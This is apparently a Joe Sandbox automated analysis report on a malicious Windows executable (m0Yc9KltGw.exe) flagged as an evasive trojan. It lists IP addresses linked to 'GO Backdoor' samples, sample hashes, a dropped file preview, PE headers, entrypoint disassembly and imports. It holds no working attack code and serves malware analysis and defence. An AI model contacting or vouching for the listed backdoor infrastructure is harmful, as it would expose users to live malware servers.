                          Original Sample Name:63b7bb26a60fb9e73c0e1427a4fcfaf2.exe
                          Detection:MAL
                          Classification:mal76.troj.evad.winEXE@1/1@0/6
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 78%
                          • Number of executed functions: 230
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • VT rate limit hit for: m0Yc9KltGw.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          46.8.232.106SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          188.130.206.243SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          93.185.159.253SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SVINT-ASNEShttps://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 188.130.206.243
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          na.elfGet hashmaliciousMirai, MoobotBrowse
                          • 188.130.200.140
                          FIORD-ASIP-transitoperatorinRussiaUkraineandBalticshttps://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106
                          SecuriteInfo.com.FileRepMalware.3248.17662.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 46.8.237.66
                          fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 46.8.237.66
                          Zo1o3PhmtM.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          67JPbskewt.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          nabspc.elfGet hashmaliciousUnknownBrowse
                          • 109.248.104.45
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 46.8.232.106
                          la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                          • 185.16.116.131
                          IPCORE-ASESLisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                          • 185.18.198.253
                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                          • 185.18.198.253
                          SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          n1KVzXM8Wk.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          Scan 20.02.24.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.18.198.253
                          https://facturamecr.com/Citrix-Sharefile-Portal/index.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 5.2.88.91
                          PROFORMA INVOICE.docGet hashmaliciousUnknownBrowse
                          • 5.2.91.169
                          Offer Request- GR 101002021.docGet hashmaliciousUnknownBrowse
                          • 5.2.91.169
                          I3B-ASAThttps://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                          • 195.16.243.93
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 93.185.159.253
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                          • 78.142.85.12
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\config

                          Download File
                          Process:C:\Users\user\Desktop\m0Yc9KltGw.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):416
                          Entropy (8bit):6.320559438243785
                          Encrypted:false
                          SSDEEP:6:hDvj1TuSmxUOrW5i9w61bcwggpMUy+9oCHSFjQ0PJb06l0enbImrgjSZ438bij7E:Z1SSnOR9RCrE0EybBaez8jSEjCD
                          MD5:39E17AC372042E4E923706D74C389C7F
                          SHA1:17769ED014E9E8E770F500705E44C802C098A4E4
                          SHA-256:77C3B2ECA7ECB574811E9678B2D7132A7501F6318FCD5817332689159ED16F22
                          SHA-512:C981160522269CB697F315802BC0AD17509C528AF46D34C9A32606FC8CF4230B975148B7778261C1E65C3031FFE53D180B62707146AFFCBD1EBF2F5F26FD452A
                          Malicious:false
                          Reputation:low
                          Preview:..<<......&...[$SSV"A(!?L;.']V'^X..6M.*<Q...@U$6Q#..Z7.#\../M!$6X4;.^.. U9.?E.P..6.=.*.7.(T*..3$Y..,F..'A*..W'\.__[Y@.._[..SG/.W\3..P..._7.'@.-)U"..X..$B2.(.?Y1.SS.."8?.6W.S.29A<..L89WP .8].X.M.,.X&9.V.=.V6W%G427_#/4V...P+08@2.>Q.8.\&..]0$%O..P...8.%,...9..31.T>!PL.,.F..-W.9RR!*.G+9=\..!R?Z.[.R.@?[UR.=._ .:X./?M..!P..W_...O<8.......]P.!.....=T(13L..2F$95_T?R[./.Q.5X@<.+R..#Z..*^"(.M?.U[%. ^$..U'<#G.+.\#9+W>..Z.2*

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.344609272629543
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.81%
                          • Windows ActiveX control (116523/4) 1.15%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:m0Yc9KltGw.exe
                          File size:9'312'768 bytes
                          MD5:63b7bb26a60fb9e73c0e1427a4fcfaf2
                          SHA1:83b9ac53d958a36dd340f93d08615f452584cf17
                          SHA256:e78fc7300dea3f82b9fb7130621e27f5459d4a521243fd42033f6f010f2995e2
                          SHA512:692123501d5bcbf2374c2cd3d95bd4d479486f9cee89e41334629485e6f8d5cad9eb6eb8b4602fefe3b72835f9630839c1896459a0c0dde5c05d45e7028bbc82
                          SSDEEP:196608:9Kh403NRb/3CZPrcgGkgMgMf06UujdDuBa6QZFzABsPFMw:9Kh4INxuLPfdjwy0qF1
                          TLSH:B1967BAB05C26DDDEEE47BF19719E9B64290CC2EF83CC179EA5377AB812068344DC590
                          File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                          File Icon

                          Icon Hash:8000601cc3780c93

                          Static PE Info

                          General

                          Entrypoint:0x5025d8
                          Entrypoint Section:.itext
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:f62b90e31eca404f228fcf7068b00f31

                          Authenticode Signature

                          Signature Valid:
                          Signature Issuer:
                          Signature Validation Error:
                          Error Number:
                          Not Before, Not After
                            Subject Chain
                              Version:
                              Thumbprint MD5:
                              Thumbprint SHA-1:
                              Thumbprint SHA-256:
                              Serial:

                              Entrypoint Preview

                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFF0h
                              push ebx
                              push esi
                              push edi
                              mov eax, 00500930h
                              call 00007FD6B8FAA220h
                              push FFFFFFECh
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov ebx, dword ptr [eax+00000170h]
                              push ebx
                              call 00007FD6B8FB1A31h
                              and eax, FFFFFF7Fh
                              push eax
                              push FFFFFFECh
                              mov eax, dword ptr [00505E5Ch]
                              push ebx
                              call 00007FD6B8FB1C86h
                              xor eax, eax
                              push ebp
                              push 00502653h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              push 00000001h
                              call 00007FD6B8FB13D1h
                              call 00007FD6B90A826Ch
                              mov eax, dword ptr [00500568h]
                              push eax
                              push 005005CCh
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              call 00007FD6B902405Dh
                              call 00007FD6B90A82C0h
                              xor eax, eax
                              pop edx
                              pop ecx
                              pop ecx
                              mov dword ptr fs:[eax], edx
                              jmp 00007FD6B90AA23Bh
                              jmp 00007FD6B8FAC2ADh
                              call 00007FD6B90A803Ch
                              mov eax, 00000001h
                              call 00007FD6B8FACD6Eh
                              call 00007FD6B8FAC6F1h
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov edx, 005027E8h
                              call 00007FD6B9023B68h
                              push 00000005h
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov eax, dword ptr [eax+00000170h]
                              push eax
                              call 00007FD6B8FB1C47h
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov edx, dword ptr [004DACA0h]

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x10e0000x3840.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1140000x7d90fc.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1694000x1a60.rsrc
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x10ea800x88c.idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xffdc80xffe00de5f49260bb90d8d1e2e922872ccd636False0.4830248916096727data6.590737520337448IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .itext0x1010000x17f40x1800eb5323291d86155b4efcb8378c9c4adcFalse0.5242513020833334data6.004648972685504IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data0x1030000x308c0x3200c2acc8e96fc244753abd1d87bb624bc0False0.425078125data4.3575606000501415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .bss0x1070000x61980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata0x10e0000x38400x3a000e1e8128f777a5ff18a144305a4fb39cFalse0.3108836206896552data5.2048781278956655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .tls0x1120000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rdata0x1130000x180x2009cf98ea6bb17a35d99fa770a2e9a8ff0False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x1140000x7d90fc0x7d9200353cbee8ae0e2a3c9acdb07ce0da5a3eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_CURSOR0x114e800x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                              RT_CURSOR0x114fb40x134dataEnglishUnited States0.4642857142857143
                              RT_CURSOR0x1150e80x134dataEnglishUnited States0.4805194805194805
                              RT_CURSOR0x11521c0x134dataEnglishUnited States0.38311688311688313
                              RT_CURSOR0x1153500x134dataEnglishUnited States0.36038961038961037
                              RT_CURSOR0x1154840x134dataEnglishUnited States0.4090909090909091
                              RT_CURSOR0x1155b80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                              RT_BITMAP0x1156ec0x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                              RT_BITMAP0x115bd40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                              RT_ICON0x115cbc0xbb3dPC bitmap, Windows 3.x format, 6211 x 2 x 51, image size 48174, cbSize 47933, bits offset 540.4672146537875785
                              RT_ICON0x1217fc0x6442PC bitmap, Windows 3.x format, 3403 x 2 x 39, image size 26415, cbSize 25666, bits offset 540.5660017143302424
                              RT_ICON0x127c400x392fPC bitmap, Windows 3.x format, 2117 x 2 x 51, image size 14801, cbSize 14639, bits offset 540.5403374547441765
                              RT_ICON0x12b5700x16c45PC bitmap, Windows 3.x format, 12059 x 2 x 54, image size 93532, cbSize 93253, bits offset 540.5215060105304923
                              RT_ICON0x1421b80x74c036PC bitmap, Windows 3.x format, 956907 x 2 x 42, image size 7651831, cbSize 7651382, bits offset 540.6329851150512695
                              RT_ICON0x88e1f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.16124733475479744
                              RT_ICON0x88f0980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.18005415162454874
                              RT_ICON0x88f9400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.17799539170506912
                              RT_ICON0x8900080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.16473988439306358
                              RT_ICON0x8905700x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.013026304109832234
                              RT_ICON0x8d25980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.07717842323651453
                              RT_ICON0x8d4b400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.0947467166979362
                              RT_ICON0x8d5be80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.1540983606557377
                              RT_ICON0x8d65700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.19858156028368795
                              RT_STRING0x8d69d80xecdata0.6059322033898306
                              RT_STRING0x8d6ac40x250data0.47466216216216217
                              RT_STRING0x8d6d140x28cdata0.4647239263803681
                              RT_STRING0x8d6fa00x3e4data0.4347389558232932
                              RT_STRING0x8d73840x9cdata0.717948717948718
                              RT_STRING0x8d74200xe8data0.6293103448275862
                              RT_STRING0x8d75080x468data0.3820921985815603
                              RT_STRING0x8d79700x38cdata0.3898678414096916
                              RT_STRING0x8d7cfc0x3dcdata0.39271255060728744
                              RT_STRING0x8d80d80x360data0.37037037037037035
                              RT_STRING0x8d84380x40cdata0.3783783783783784
                              RT_STRING0x8d88440x108data0.5113636363636364
                              RT_STRING0x8d894c0xccdata0.6029411764705882
                              RT_STRING0x8d8a180x234data0.5070921985815603
                              RT_STRING0x8d8c4c0x3c8data0.3181818181818182
                              RT_STRING0x8d90140x32cdata0.43349753694581283
                              RT_STRING0x8d93400x2a0data0.41964285714285715
                              RT_RCDATA0x8d95e00x82e8dataEnglishUnited States0.11261637622344235
                              RT_RCDATA0x8e18c80x10data1.5
                              RT_RCDATA0x8e18d80x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                              RT_RCDATA0x8e30d80x6bcdata0.6467517401392111
                              RT_RCDATA0x8e37940x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                              RT_RCDATA0x8e92a40x125Delphi compiled form 'TMainForm'0.7508532423208191
                              RT_RCDATA0x8e93cc0x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                              RT_RCDATA0x8e97700x320Delphi compiled form 'TSelectFolderForm'0.53625
                              RT_RCDATA0x8e9a900x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                              RT_RCDATA0x8e9d900x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                              RT_RCDATA0x8ea36c0x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                              RT_RCDATA0x8ea7d00x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                              RT_GROUP_CURSOR0x8ec8640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                              RT_GROUP_CURSOR0x8ec8780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                              RT_GROUP_CURSOR0x8ec88c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x8ec8a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x8ec8b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x8ec8c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_CURSOR0x8ec8dc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                              RT_GROUP_ICON0x8ec8f00x84dataEnglishUnited States0.6590909090909091
                              RT_VERSION0x8ec9740x15cdataEnglishUnited States0.5689655172413793
                              RT_MANIFEST0x8ecad00x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                              Imports

                              DLLImport
                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                              advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                              user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                              user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                              msimg32.dllAlphaBlend
                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                              version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                              mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                              kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, 